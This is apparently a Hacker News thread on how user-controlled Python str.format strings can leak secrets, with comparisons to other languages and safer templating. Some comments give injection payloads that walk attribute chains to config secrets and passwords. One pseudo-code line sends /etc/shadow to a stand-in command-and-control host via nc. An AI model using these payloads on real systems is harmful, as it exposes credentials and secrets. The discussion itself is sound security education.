Be Careful with Python's New-Style String Format

tedunangst · on Dec 31, 2016

Maybe a more fully worked example is needed. You're making a blog hosting service as a service service. Bloggers have different ideas about what page titles should be.

    Post Title
    Blog Name: Post Title
    Blog Name - Post Title
    Post Title - Blog Name
    Blog Name ----embdash---- Post Title
    ~~~ xXx Post Title xXx ~~~

It's a little overwhelming to put every possibility in a dropdown, so you allow the user to specify a format string.

    title = userformats.title.fmt(post)

This doesn't look so very dangerous. And then the user can say

    "{post.title} - {post.blog.title}"
    "{post.title}: Another fine post by "{post.author}"
    "~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~"

And then oops.

bubblesocks · on Dec 31, 2016

Isn't ingesting user input directly considered a bad idea all around though?

raspie · on Dec 31, 2016

Yes, but it's not obvious how to sanitize input in this case, or that it even needs sanitizing. Formatting a string sounds pretty innocuous.

userbinator · on Dec 31, 2016

I think "it's not obvious how to sanitize input" is the main point here --- one advantage of the %-style format strings, they're easier to parse and escape.

tedunangst · on Dec 31, 2016

But we don't want the string escaped. We want it interpreted.

tzs · on Jan 1, 2017

We want it interpreted, but we don't have to let the language handle it directly. A much safer way is to define our own syntax for this and interpret it in our code, with that code only having access to a limited set of safe substitutions.

For instance, suppose we want to allow user formatting of contact information. A contact entry has a name, address, phone number, and email address. The user supplies a template string using %_NAME_, %_ADDR_, %_PHONE_, and %_EMAIL where they would like the name, address, phone number, and email address substituted, respectively.

I'd probably be doing this in Perl, and I'd do it something like this:

  sub format_contact
  {
    my($template, $name, $addr, $phone, $email) = @_;
    my %val = (name => $name, addr => $addr,
            phone => $phone, email => $email);
    $template =~ s/%_([a-z]+)_/$val{lc($1)}/gi;
    return $template;
  }

jgalt212 · on Jan 1, 2017

yes, basically eval is evil

masklinn · on Jan 1, 2017

That's not even eval, the entire thing is a series of dynamic attribute lookups[0], you can trivially implement that in pure Python without needing to `eval` anything.

[0] it also supports mapping and sequence lookups IIRC but that's about the same thing

xapata · on Jan 1, 2017

And yet, eval is necessary for so many important things...

onchance · on Jan 3, 2017

Would sanitizing for double underscores be enough to capture the most dangerous cases?

    import re
    
    def sanitize(user_input):
        """Sanitize user input for str.format
        
        Usage:
            sanitize("{post.title} - {post.blog.title}")
            sanitize("{post.title}: Another fine post by "{post.author}")
            sanitize("~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~")
        
        """
        return re.sub(r'{[^}]*__[^}]*}', '', user_input)

Even better, we could specify which variables to allow in user input:

    import re
    
    def sanitize(user_input, *allowed_variables):
        """Sanitize user input for str.format
        
        Usage:
            allowed_variables = ["post.blog.title", "post.title", "post.author"]
            sanitize("{post.title} - {post.blog.title}", *allowed_variables)
            sanitize("{post.title}: Another fine post by "{post.author}", *allowed_variables)
            sanitize("~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~", *allowed_variables)
        
        """
        for match in re.finditer(r'{([^}]*)}', user_input):
            if match[1] not in allowed_variables:
                user_input = user_input.replace(match[0], '')
        return user_input

orangecat · on Dec 31, 2016

Yes, so someone might think to verify that it matches a seemingly safe pattern like "word characters separated by zero or more periods", which is still insufficient.

foolfoolz · on Dec 31, 2016

ingesting raw user input is good

emitting raw user input is bad

peller · on Dec 31, 2016

Isn't SQL injection caused by ingesting raw user input though?

Seems to me you always have to be careful with user-supplied data.

halomru · on Dec 31, 2016

I would have said that SQL injection is caused by emitting unescaped user input to your SQL server

tlrobinson · on Jan 1, 2017

If I call eval(string) am I emitting unescaped user input to the eval function?

I guess the definition of "injest" here is reading bytes off the wire?

john_reel · on Jan 1, 2017

If string is unescaped user input, then yes, you are.

meowface · on Dec 31, 2016

"Ingesting raw user input is good if you only use it to interface with other systems that provide a way to separate data from instructions or at least escape strings."

foolfoolz · on Dec 31, 2016

sql injection is commonly caused by combining your query with its related data parameters in unsafe ways. you are emitting raw user input you received to another program, the database, it's your responsibility to give this to the DB safely.

you still have to be careful, and when you follow all the right best practices you can safely ingest raw user input.

I've worked at a company that escaped user input before inserting into the DB. it's a horrible nightmare I don't think anyone should have to experience.

mistaken · on Dec 31, 2016

Even if you don't emit the input you can run commands on the server. You can open up a reverse shell or deduce data from timing based side-channels. IMHO working with raw user data is bad; it should be sanitized/canonicalized before doing anything.

foolfoolz · on Dec 31, 2016

if you're running commands on the server I would consider your program as emitting output directly to another program. it's up to you to make sure you call it correctly and not emit raw user data

nitrogen · on Jan 1, 2017

It seems the format string can run commands on the server.

I don't know Python, so this is a pseudo code example that a user could enter:

    "{system('nc c_and_c_box.example < /etc/shadow \
      > /dev/null')} Nothing to see here, move along"

cyphar · on Jan 1, 2017

Format strings in python are not equivalent to eval. The syntax looks similar, but it's actually limited to evaluating methods and list elements in a given object. Now, with Python's monkeys patchability this is worrying, but it's far from being eval.

lilyball · on Jan 2, 2017

I feel like this sort of thing should be done with a proper template engine rather than just string formatting.

anderskaseorg · on Dec 31, 2016

The proposed idea of relying on undocumented internals and blacklisting attribute names to securely sandbox formatting strings is _really_ _dangerous_. Never do that in production code! Language expansions could render your sandbox unsafe at any time.

You can write your own safe formatting engine in much less code.

    def safe_format(fmt, **args):
        return re.sub(r'\{([^{}]*)\}', lambda m: args.get(m.group(1)), fmt)
    
    safe_format('{foo} {bar}', foo='Hello', bar='world')  # Hello world

Add bells and whistles as desired.

wfunction · on Dec 31, 2016

+1 I freaked out when I saw it. Blacklists are just asking to get hacked.

tedunangst · on Dec 31, 2016

The first bell added is likely to be field access.

cyphar · on Jan 1, 2017

Which immediately becomes a security risk because classes can overload __getattr__ and __getitem__. So now you're executing random code.

Of course, %s does the same thing (__str__) but at least %s doesn't take any arguments.

sirclueless · on Jan 1, 2017

The assumption behind string.format and friends is that people who override __getattr__ and __getitem__ know what they're doing. Which is probably a reasonably safe tradeoff in order to allow attribute access.

I'm not worried about executing arbitrary code, because it's not user-supplied and it's normal for a templating library to access attributes of objects you pass to it (if it was unsafe you shouldn't have done that). This is more of a snafu with the number of sensitive and powerful attributes available by default on Python objects.

anderskaseorg · on Jan 2, 2017

Read the article. The danger is not __getattr__ and __getitem__ but rather things like event.__init__.__globals__[CONFIG][SECRET_KEY]. There is no such thing as an object where arbitrary attribute access is safe, because every object has a constructor function and every function references the globals dict.

coldtea · on Dec 31, 2016

Err, why would you allow for the user to enter arbitrary format strings in the first place?

Might as well write "be careful about eval of arbitrary user provided strings".

tedunangst · on Dec 31, 2016

"Customize the look of your blog by editing these templates."

coldtea · on Dec 31, 2016

Shouldn't that be based not on the built-in string capabilities, but on a template engine, that must also take care for much more narrow cases of abuse (e.g. SQL injection, or access to only of a restricted number of helper functions within the template)?

icebraining · on Dec 31, 2016

The author discovered this exploit in the template engine he wrote (Jinja2).

dom0 · on Jan 1, 2017

While the vuln is there, it's a rather obscure way of using the engine in the first place, so in "good" templates it shouldn't be exploitable. See the example in the release: https://www.palletsprojects.com/blog/jinja-281-released/

icebraining · on Jan 1, 2017

Sure, but like tedunangst pointed out, there are valid reasons to allow users to edit those templates, in which case you can't assume they'll be "good".

coldtea · on Jan 1, 2017

Why would a template engine allow for free access to the native platforms string capabilities in the first place?

obstinate · on Jan 1, 2017

Native vs. non-native is irrelevant. A non-native formatting system could have the features of the python formatter that are dangerous. Or, if Python's native formatter lacked these dangerous features, there'd be no reason not to use it.

coldtea · on Jan 1, 2017

>Native vs. non-native is irrelevant. A non-native formatting system could have the features of the python formatter that are dangerous.

Hardly irrelevant. The idea is that a non-native formatting system is build specifically for the templating engine, and so the developers controls what it can do and gives it non-dangerous features.

>Or, if Python's native formatter lacked these dangerous features, there'd be no reason not to use it

Even if it did lack them, it's not under the control of the template platform author, so they should not rely on it for such a crucial part of the template engine as string formatting.

(Which is exactly the case here: Python lacked those features before, but got them, and bit the template engine in the back).

obstinate · on Jan 2, 2017

> it's not under the control of the template platform author

This doesn't really matter. If it does what you want, it's not like they're going to change the formatter's behavior from under your feet if it's part of the language's default runtime.

nine_k · on Dec 31, 2016

I'll consider switching to a different engine.

jessaustin · on Dec 31, 2016

Perhaps one that hasn't had this exploit fixed yet?

tedunangst · on Dec 31, 2016

Many templates allow accessing fields. There's no risk of SQL injection, you're only echoing the output back to the user.

yawaramin · on Jan 1, 2017

Didn't you just point out that some of those fields could be sensitive, like password info?

dom0 · on Jan 1, 2017

What does the template engine have to do with SQL? Not really following you there.

coldtea · on Jan 1, 2017

A template engine has multiple use cases its author can not foresee, not just creating pages.

Here they talk of using it for translation, with arbitrary user provided strings for example. Another could use it to create an SQL helper (accounting themselves for injection) etc.

In any case, it should not contain dangerous helper methods of capabilities not fit for strictly templating, just because the native string class allows them.

Animats · on Dec 31, 2016

Internationalization, usually. Word order differs between languages, and this kind of format allows reordering the inserted values.

zbraniecki · on Dec 31, 2016

Internationalization should never use arbitrary string or system level formatting.

Look at MessageFormat or L20n. Yeah, I know that it's more complex than what you think you need (I've hear the "let's just use JS template literals" so many times) but you actually do.

Manishearth · on Dec 31, 2016

A lot of folks do use lang format strings for i18n, but they really shouldn't. They won't be able to handle pluralization and other oddities.

coldtea · on Dec 31, 2016

Yes, but that's meant for trusted translators of the UI, nor arbitrary users, right?

icebraining · on Dec 31, 2016

In some applications, users can change the their own translations, which are stored in the DB, to allow for easier customization.

coldtea · on Jan 1, 2017

Still, no reason to save them in the platforms native string format and with full reign over native strings.

azernik · on Jan 1, 2017

In practice, translators are often externally contracted; the amount of work required to translate any given language is not large enough to make these full-time positions. So only trusted so far.

brianwawok · on Dec 31, 2016

Templates. Very useful in many places.

Although if you are using templates in Python, you are likely using jinja2. And they just "fixed" the bug. So you are good to go if your upgrade.

dom0 · on Jan 1, 2017

Although this only applies to format-string evaluation in Jinja2, which would look something like

    {{ "Hello {user.name}".format(user) }}

which is really kinda obscure, especially since Jinja already has an explicit |format using the very safe / limited (but generally sufficient) alternative %(key)s syntax (also suitable for i18n, to some extend).

jlarocco · on Jan 1, 2017

Yeah, that was my first thought, too, and it's not very fair to blame Python's new style string format.

Treating user input as a format string has always been a bad idea in every language and library that use them.

thinkpad20 · on Jan 1, 2017

Not necessarily true. Type systems can ensure safety without too much effort. For example in Haskell, you might have some sort of format function with the type signature

    -- Given appropriate Error and Context types 
    format :: Context -> Text -> Either Error Text

Which would be guaranteed to be safe (there is no way this function can execute arbitrary code or read from your file system, short of egregious abuses of unsafePerformIO in its implementation). Note that the signature I wrote above takes an explicit context (presumably some sort of mapping of available variables), which removes the need for supporting arbitrary attribute access in the first place, and is more explicit to boot.

There is no reason other languages or libraries could not implement a function with the same degree of safety, although their type systems might not be able to guarantee its safety. In fact I would wager that such pitfalls are only likely to be found in dynamic languages, which support runtime eval (which is, after all, the root of the described problem).

kazinator · on Dec 31, 2016

Sane Lisp approach: provide easily analyzable target syntax.

  This is the TXR Lisp interactive listener of TXR 163.
  Use the :quit command or type Ctrl-D on empty line to  exit.
  1> (defvar foo 42)
  foo
  2> `@(list foo) ... @foo`
  "42 ... 42"

What is that backticked literal? Let's quote it:

  3> '`@(list foo) ... @foo`
  `@(list foo) ... @foo`

Hmm, prints back in same form. Probably syntactic sugar for a list; what is in the car? cdr?

  4> (car '`@(list foo) ... @foo`)
  sys:quasi
  5> (cdr '`@(list foo) ... @foo`)
  ((list foo) " ... " @foo)

What if we type in this syntax ourselves:

  6> '(sys:quasi (list foo) " ... " (sys:var foo))
  `@(list foo) ... @foo`

Prints as the notation!

To sandbox this, we just have to walk a list and enforce some rule. For instance, the rule might be that all elements after sys:quasi must be string object or else (sys:var sym) forms, where sym is a symbol on some allowed list. Thus (list foo) would be banned.

A custom interpreter which calculates the output string while enforcing the check is trivial to write as a one-liner.

Of course if your program just eval such an untrusted quasiliteral, it has access to the dynamic/global evironment:

   `Mouhaha! @(file-get-string "/etc/passwd")`

Very convenient for some attacker. :)

shakna · on Dec 31, 2016

If you're LISP has first class environments, then this becomes much easier, and safer.

    (eval (read (get-some-user-string))
      (let [
             (post-title post-title)
             (post-date post-date)
             (post-author post-author)
             (fmt string-append)
           ]
           (null-environment)))

eval is only executed in the context of some environment, and the only things it has access to are some strings, and a string concatenation procedure.

It doesn't have access to lambda, quasiliterals or quotes, or anything of the like.

I do have code like this in production, because eval only looks up within it's environment... Which is empty apart from the bound let. No closure access.

swift · on Dec 31, 2016

Lua has this feature as well and it's fantastically useful for this kind of use-case, or more generally anywhere where you want to allow scripting.

shakna · on Dec 31, 2016

The more I use Lua, the more it seems like the sanest of the scripting languages out there.

kazinator · on Jan 1, 2017

My Lisp has search through a first-class environnment which falls back on a dynamic/global environment. A way could be provided to suppress the fallback, like a special environment node indicating "do not search for bindings past me, stop here".

If we have a completely empty environment, then we cannot eval the (sys:quasi ...) form itself; the sys:quasi symbol itself has no binding.

A nice idea might be to have a filter object in the environment stack which says "only if you're looking for one of these specific symbols, can you proceed to the global environment". Then we can easily arrange for select global bindings to be visible.

shakna · on Jan 1, 2017

You don't want the sys:quasi form to evaluate: It can be used as an escape hatch. If you're binding to the null-environment, you can provide everything a user can use.

In my above example, a user can do things like:

(fmt post.title post.date)

(fmt post.title "@" post.date)

(fmt (fmt post.title "@" post.date) "by" post.author)

But they can't escape the sandbox and do anything else.

To make a list, they need access to list, or quote, otherwise they just have number and strings, and anything else you give them.

If you give them anything more than a null-environment, you begin to lose the safety of a safe evaluation, which might be something you want to do yourself, but not something that you want a user to have access to, or they'll find an escape hatch, like sys:quasi, and gain access to areas they shouldn't.

Which is as bad as any SQL injection, if not worse.

So, a safe eval, can be created, without the need for any further analysis, if eval is handed an environment, and only uses it.

If the eval then searches the global environment, then the eval is unsafe, and you should never hand it user input, unless you have first ensured it's safe... Which defeats all the niceness provided by first class environments.

Eval is only not evil, if the programmer controls all the bindings to eval's environment.

REPL's usually use an unsafe eval and environment, and that makes sense, as you want to be able to do anything you want in code.

But a templating language doesn't need, and shouldn't use, all the unsafeness of a Turing Complete language, that might have access to your system.

nhumrich · on Dec 31, 2016

This article makes you thing the new f-strings will be discussed. What is really being discussed is 'string'.format(), which isn't new in any way.

eternauta3k · on Dec 31, 2016

It's referred to in the documentation as 'New-style', with the old style being the % operator.

tedmiston · on Dec 31, 2016

Yes but quite confusing when we have another new style string format actively being discussed in recent months vs this "new-style formatting" which has existed since 2006.

It's much clearer to just refer to it as str.format.

halomru · on Dec 31, 2016

It's what invariably happens when you incorporate words like "new", "super" or "high definition" in the name of something. I'm still hoping that at some point our industry learns that lesson.

smitherfield · on Jan 1, 2017

It does feel a little (unintentionally?) clickbaity.

Animats · on Dec 31, 2016

No, Rust does not have the ability to access any variable in the program via a format string. Rust has this:

   format!("{argument}", argument = "test");   // => "test"

That's just named arguments to the format. Also, that's a macro; it's expanded at compile time.

Python's approach is lame. It should have used something with a limited list of named arguments, or maybe a dict.

gizmo686 · on Dec 31, 2016

Neither does python.

The problem being discussed here is that the format string can access and attribute of the object passed in. From PEP3101 [0]:

" Unlike some other programming languages, you cannot embed arbitrary expressions in format strings. This is by design - the types of expressions that you can use is deliberately limited. Only two operators are supported: the '.' (getattr) operator, and the '[]' (getitem) operator. The reason for allowing these operators is that they don't normally have side effects in non-pathological code."

[0] https://www.python.org/dev/peps/pep-3101/

unscaled · on Jan 1, 2017

Which is still not safe enough, and in effect can be used to access any global variable as described in the OP article.

Rust formatting is done by macros - which expand at compile time and accept only string literals. This makes it impossible to pass user input to format!(), println!() and their ilk unless the end-user can access your compiler, in which case you have a much larger problem.

steveklabnik · on Jan 1, 2017

There are crates like https://crates.io/crates/strfmt which let you accept a non-literal.

detaro · on Dec 31, 2016

> don't normally have side effects in non-pathological code

so, "be careful with it if you can't make sure code isn't non-pathological or friendly", what the article says.

gizmo686 · on Dec 31, 2016

The example is not pathalogical. The property that the PEP states is that the expression should not have side effects, which is the case.

Having pathological code in this context only elavates the severity from a pure data leak to partial code execution. Of course partial code execution in an unexpected context often leads to arbitrary code execution.

geofft · on Dec 31, 2016

In many webapps, there's a very easy way to go from a data leak to arbitrary code execution. For instance, if you have signed cookies that are pickles of data, the cookie signing key lets you execute arbitrary code (because pickle deserialization can execute arbitrary code).

dom0 · on Jan 1, 2017

... which is why it's a poor idea to do that in the first place, since it has literally a single layer of protection against remote, unauthorized, arbitrary code execution, that depends on keeping a static key secret.

Much better idea to use a stupid, non-ACE serialization there.

echelon · on Dec 31, 2016

> Neither does python.

I would argue that being able to access any global value is a sufficient enough concern.

zardeh · on Dec 31, 2016

The security issue here isn't with f strings, which oddly enough, don't have this flaw (because they are literals only). This has to do with new style string formatting, which does not have access to globals.

progval · on Dec 31, 2016

> It should have used something with a limited list of named arguments, or maybe a dict.

Python does have that feature, called Template Strings: https://docs.python.org/3/library/string.html#template-strin...

tedmiston · on Dec 31, 2016

Agree that these are a much better solution that I wish Armin would have dedicated a few sentences to.

Manishearth · on Dec 31, 2016

> It should have used something with a limited list of named arguments, or maybe a dict.

That's what "old-style" python interpolation did :)

You could do |"hi my name is %s and I live in %s" % (name, place)| or use named arguments with a dict (|"hi my name is %(name) and I live in %(place)" % {"name": name, "place": place}|).

I like JS format strings -- you can write arbitrary code in them, but they are compile time only (and use a different string syntax). So you can have |`Hello my name is ${name} and I come from ${place}. My profession is ${generate_random_profession()}`|. The backtick-string isn't a different type, and can't be moved around like a value. It's a different kind of way of specifying a string literal, and will be evaluated when specified. No way of doing injection there.

I suspect Python wanted to make it less verbose with new-style interpolation, and went a bit overboard with field access without realizing or caring about possible security issues like this.

Of course, python has a third kind of format string; interpolation string literals (|f"hello my name is {name} ..."|), which work like JS and Ruby. This is what you should be using IMO.

saghm · on Jan 1, 2017

> I like JS format strings -- you can write arbitrary code in them, but they are compile time only

Genuinely curious: what exactly does "compile-time" mean in the case of JS? Is it like C macros (modifying the source code before parsing)?

Manishearth · on Jan 1, 2017

No, it's not that, I was using the term loosely.

I meant that you cannot use a string value as a format string. It only exists in the form of a literal, and it gets evaluated when the interpreter evaluates that literal. You cannot store it and format it later.

saghm · on Jan 1, 2017

Ah, I see. Thanks!

kukx · on Dec 31, 2016

Also, in C# the string interpolation works only on literal strings at compile time. So it's not possible to inject a malicious code this way from outside of the source code.

icebraining · on Dec 31, 2016

So does in Python. This isn't string interpolation, it's the equivalent of String.Format.

lilyball · on Jan 2, 2017

FWIW, Rust's syntax is based on Python's, but yeah, you can't access value fields in Rust's syntax.

agentgt · on Dec 31, 2016

This is actually a problem with a lot of languages that allow runtime template like String interpolation.

For example Groovy on the JVM has GStrings which one can do fairly nasty things.

As well it actually is fairly hard to lock down most of the template languages on the JVM for user templates. (If you are going to allow user templates I recommend one of the Java Mustache-like implementations).

ryanmccullagh · on Dec 31, 2016

This is the same principle for not passing user input to the first argument of `printf(3)` in C. Coming from C, I would never allow the user control of the format string if I were writing code.

cyphar · on Jan 1, 2017

The reasoning why printf strings in C are unsafe is not applicable in python though. You cannot access memory directly, and %n doesn't exist (nor other other fun POSIX requirements that write to random places on the stack). In fact, Python's C-style formatting strings are immune to this problem (even the extended form that allows you to name arguments).

jlarocco · on Jan 1, 2017

That's pointless nitpicking. The point is that user specified format strings allow the user to access things they shouldn't be able to access. It's the same in every language that has format strings.

cyphar · on Jan 2, 2017

> That's pointless nitpicking. The point is that user specified format strings allow the user to access things they shouldn't be able to access. It's the same in every language that has format strings.

It's not nitpicking. Go's format strings don't allow you to access stuff you shouldn't be able to. In fact, Go's templating language[1] doesn't allow you to access anything that you haven't explicitly provided to the template instance.

Allowing users to format text is not an impossible problem. It's the fault of language creators that they don't make this easier.

[1]: https://golang.org/pkg/text/template/

peterwaller · on Dec 31, 2016

Reminds me of the turing complete interpreter lurking in libc's printf.

https://github.com/HexHive/printbf

tzury · on Jan 1, 2017

If within the context that parse and execute user input, sensitive data is available, then what this has to do with New-Style String Format? I mean,

    {event.__init__.__globals__[CONFIG][SECRET_KEY]}

Shall not be available to any function call, whatsoever!

innocentoldguy · on Dec 31, 2016

While I agree this is a possible attack vector, I think it is extremely unlikely, at least in the localization realm, for several reasons:

1. The localization company should never know what programming language you're using.

2. You shouldn't give localization companies direct access to your internal strings. More than hacking your code, they're almost guaranteed to screw the formatting up.

3. Typically, translators are hired for their native language abilities, and not for their technical prowess. I've met precious few who knew how to open a text editor, let alone hack your product via its strings.

I worked with Python and I18N/L10N for about 15 years. The way I always handled localization was to parse all our strings into a PostgreSQL database, and then provide a web interface for translators to do their work. This interface provided translators with the full-context of the strings they were translating, which internal strings often don't, prevented the inclusion of certain characters and keywords, and kept the translators from screwing up the formatting. By doing it this way, we got much better translations, and our internal strings were never out of our control.

the_mitsuhiko · on Dec 31, 2016

Most internationalization these days goes through things like transifex. Becoming a translator on a specific project is not completely unlikely if you want to target it.

bubblesocks · on Dec 31, 2016

I find it depends on the project and the localization company. I've used big ones, like Lingotek and LION (or whatever they're called now), but there are still a lot of small companies that do things manually, and for a lot less.

Manishearth · on Dec 31, 2016

Yeah, I never liked Python's "new-style" format because of this. It didn't occur to me that you could use field access to access globals (never done enough Python metaprogramming to mess with the reflection stuff), but I was afraid of arbitrary getters being invoked.

In general I'm very wary of runtime string formatting. Strings tend to be untrusted input with a large degree of freedom. format strings are almost always known at compile time (and more trustworthy). If your interpolation system is more than simply mapping keys to values or positions, you should probably restrict it to compile time. Feel free to expose a harder-to-use runtime API. Rust has compile-time format strings, for example. They're not as powerful as `str.format`, but they could be without there being security issues. JS has a different syntax for format literals. Regular strings cannot be "formatted", you must specify a string literal with backticks and that gets converted to a string value when the interpreter gets there. These literals can execute arbitrary code, but since it's just literals there's no way for an untrusted string to get in there.

One main use case for runtime string formatting is i18n. But that really should use a different solution. Most string formatting APIs are geared for programmer convenience -- the programmer is writing the code and the string. The scales shift for translators, who are only writing the strings. They don't need things like field access and stuff.

Besides, most string formatting APIs are inadequate for i18n. Not if you want to handle stuff like pluralization (http://mlocati.github.io/cldr-to-gettext-plural-rules/).

Another use case is template engines and stuff like that. In that case, field access is useful, but you probably should exert more control on these things (which is exactly what jinja2 seems to be doing here)

At one point I toyed with an idea for a super-type-safe template engine in Rust. It would validate the templates at compile time, and additionally ensure that the right types are in the right places. For example, it could ensure that strings that get interpolated with the HTML are either "trusted", escaped, or otherwise XSS-sanitized (using the type system to mark such types). Similarly, url attributes (href, etc) can only have URLs that have been checked for `javascript:`. Never got around to writing it, sadly.

unscaled · on Jan 1, 2017

I was always puzzled by Python's insistence to forego string interpolation until the latest version.

Runtime string formatting, even if done safely (e.g. .NET's String.Format() which doesn't have property access AFAIK), can still cause unexpected exceptions at the very least, and suffers from inferior performance.

yladiz · on Dec 31, 2016

So is the issue that it's a problem to let the format string be controlled arbitrarily? It's good to warn users around it because some may not know the dangers, but in general you don't trust user input, so I don't really see this as something you need to build something custom around, rather just be careful and follow good practices. It should be understood not to pass user data directly to internal code without sanitizing it. Proposing some custom code that uses undocumented internal features is overkill and also dangerous since things that aren't documented/internal can change suddenly.

geofft · on Dec 31, 2016

> It should be understood not to pass user data directly to internal code without sanitizing it.

But how do you sanitize it? If you hadn't read this article and were told to sanitize a format string, how would you implement that?

Unless you know exactly what the problem is, you're basically reduced to writing your own string formatter. (Though see 'anderskaseorg's example, it's a lot less code if you do.)

tedmiston · on Dec 31, 2016

I think asking how to sanitize it is really asking the wrong question. We shouldn't sanitize a format string from a user in the first place. We should get input and generate a format string rather than allow one to be supplied "raw".

For example, using re.sub as another commenter pointed out.

An even more Pythonic solution would be to use the built-in string.Template [1] which at a glance appears to be safe against this kind of attack (but I haven't tested in code).

I'm not sure why Armin didn't mention string.Template in his post other than that it is much more restricted than str.format, however that kind of seems like the point to me.

[1]: https://docs.python.org/3.4/library/string.html#template-str...

daveguy · on Jan 1, 2017

Since 2.4:

https://docs.python.org/2/library/string.html#template-strin...

angusp · on Jan 1, 2017

It's a well known C pattern that you should never trust a user supplied format string, E.g. printf(arg) vs printf("%s", arg). The same applies here

Cyph0n · on Dec 31, 2016

Scala's solution to string formatting is the best out there imo. You can put basically any code into the format placeholder.

http://docs.scala-lang.org/overviews/core/string-interpolati...

UnoriginalGuy · on Dec 31, 2016

I don't really understand what you mean. They're pointing out unintended consequences of allowing arbitrary string formats. You're linking to one you call "better" which would allow even more powerful misuse of arbitrary string formats.

And while Scala's string formatting looks cool, it hardly seems like your reply applies to the topic/thread. In fact ironically it seems to point out that this would be an even bigger issue in Scala.

merb · on Dec 31, 2016

> be an even bigger issue in Scala.

not with string interpolation in scala. it only works on compile time so it's not possible to actually take user input strings (without runtime reflection of course)

> it hardly seems like your reply applies to the topic/thread

yes string interpolation (scala) has less todo with it. it can't be compared to the python one.

icebraining · on Dec 31, 2016

Python's string interpolation only works on compile time as well¹, this isn't interpolation, it's a runtime method in the string class, which Scala also has, in fact, with the same name (.format).

¹ (compilation in CPython generally occurs during initialization of the execution, though you can pre-compile files manually)

merb · on Dec 31, 2016

thanks for correcting me, actually my statement is not wrong that it has nothing to do with `.format` I was just mistaken about the python code, I tought it means the new stuff (i.e. interpolation), but I actually skipped the first code snippet.

kazinator · on Dec 31, 2016

What the Python code is doing is arguably a form of run-time reflection. Format strings contain embedded variables and expression, and the format function evaluates them: hence reflection.

Format strings occurring as literals in Python source could be treated at compile time, like in Scala.

babyrainbow · on Jan 1, 2017

Discussion when this pep when it was accepted and people handwaving and down voting arguments against it.

https://www.reddit.com/r/Python/comments/3k6qi8/pep_498_appr...

tedunangst · on Jan 1, 2017

And again, not the feature under discussion.

babyrainbow · on Jan 5, 2017

Not sure what you mean...

FeepingCreature · on Jan 1, 2017

If you are making a new language, the easy way to fix this is make formatting a property of your strings, not a runtime function. Ie. instead of having "foo {bar}".format(bar=bar), have "foo {bar}" be equivalent to "foo "+bar.

This sidesteps the problem because only literal strings are formatted.

libeclipse · on Dec 31, 2016

I tend to use the old style ("%s" % "lel"). Just wondering, does this affect that too?

antsar · on Dec 31, 2016

Attribute access doesn't seem to work with old-style formatting, so I would think it's safe.

    >>> class foo:
    ...     def __init__(self, **kwargs):
    ...             self.__dict__.update(kwargs)
    ...
    >>> my_foo = foo(secret="bazinga")
    >>>
    >>> "%(foo)s" % {'foo': my_foo}
    '<__main__.foo instance at 0x1101d23f8>'
    >>>
    >>> "%(foo.secret)s" % {'foo': my_foo}
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    KeyError: 'foo.secret'

bubblesocks · on Dec 31, 2016

The nice thing about the new format is that you can reverse the order of the variables inside the string, which is nice when you're localizing strings into languages with a reversed sentence structures, like Japanese. I haven't done a ton of Python, but the old style won't let you do that, will it?

Franciscouzo · on Dec 31, 2016

Reversing the order is not possible, but you can use a dict instead:

    >>> "%(foo)s" % {"foo": "bar"}
    'bar'

dozzie · on Jan 1, 2017

Funny. I thought Python implemented all the quirks of the original printf() formatting, including using arguments at specific positions. Apparently it didn't (and arguably it's a good thing).

  $ printf '%2$s %2$s %1$s\n' aaa bbb
  bbb bbb aaa

libeclipse · on Dec 31, 2016

Heyyyyyy I did not know that. TIL, thank you.

nitely · on Dec 31, 2016

Yes, it will, just use named placeholders: "%(some)s" % {'some': 'helllo'}

tedmiston · on Jan 1, 2017

I'm not sure I understand the use case for reversing the formatting variables, but you could do this to make old-style formatting work that way:

    >>> 'hello, %s %s' % tuple(reversed(['smith', 'bob']))
    'hello, bob smith'

I think it's more readable if you abstract that bit into a lambda function:

    >>> rev_args = lambda *args: tuple(reversed(args))
    >>> 'hello, %s %s' % rev_args('smith', 'bob')
    'hello, bob smith'

Pxtl · on Jan 1, 2017

Odd they reference c# since c# does not have this feature in its traditional format strings - they don't allow you to access arbitrary members.

C# recently added string interpolation, which does allow arbitrary code, but string interpolation itself is compiled C# code and can't be stored like a format string.

Personally I use mustache when i need format-string-like-behavior from semi-trusted users.

foota · on Dec 31, 2016

Wow, I had no idea you could access attributes from within format strings.

iamsk · on Jan 10, 2017

This should be fixed built-in, like how sql injection fixed.

agumonkey · on Dec 31, 2016

Once again strings and io formatting making fun of us.

bbcbasic · on Jan 1, 2017

Pure functions ftw

atabdiwa · on Dec 31, 2016

... Uncontrolled format string bugs? In 2016? Really? Someone would fall for that? ..

the_mitsuhiko · on Dec 31, 2016

Old style format strings are perfectly safe for arbitrary user input and commonly used as such.

dom0 · on Jan 1, 2017

User-provided format strings seem rather rare to me ; at least in scenarios where the user doesn't have full access anyway (eg. controlling output formatting of some command).

dlbucci · on Dec 31, 2016

I do love writing python, but it's pretty shocking when I find out you can write something like `event.__init__.__globals__[CONFIG][SECRET_KEY]`. That language just does not care about privacy or information hiding at all, I guess.

hakanderyal · on Dec 31, 2016

Python's general mentality can be summed as "We are all consenting adults here". If you want to access some part of program or data, you generally can, but the burden of not breaking anything while messing with internals is on you.

This is a great power, but also can become an unlimited source of bugs.

brianwawok · on Dec 31, 2016

You can do the same thing in Java with reflection.

Don't let users run untrusted code. Full stop.

If you need templating use a sandbox like jinja2.

Godel_unicode · on Dec 31, 2016

The discovered vulnerability manifested itself in jinja2.

Edit: release notes https://www.palletsprojects.com/blog/jinja-281-released/

brianwawok · on Dec 31, 2016

Exactly it's already fixed. It's in the article.

dom0 · on Jan 1, 2017

Format strings aren't a template language (Python even has Template Strings for that purpose), and being able to do this is quite useful in eg. debug logs it's a shorter and easier to write "{foo.x} ({foo.__class__.__name__})".format(foo=something).

Conversely they don't prohibit expensive properties either (eg. ORM-based lookups), or generating misleading output or whatever.

jsjohnst · on Dec 31, 2016

I'd love to hear your perspectives on Ruby if this bothers you that much.

anamoulous · on Dec 31, 2016

What does Ruby have to do with any of this?

goatlover · on Dec 31, 2016

Like PHP and JS's template literals, it has full on string interpolation.

jsjohnst · on Jan 1, 2017

Guys, this has nothing to do with interpolation. I like both Python and Ruby's string interpolation. I'm replying to the incredulous parent of my post who's griping about magic methods (which admittedly Ruby likely takes the crown).

anamoulous · on Dec 31, 2016

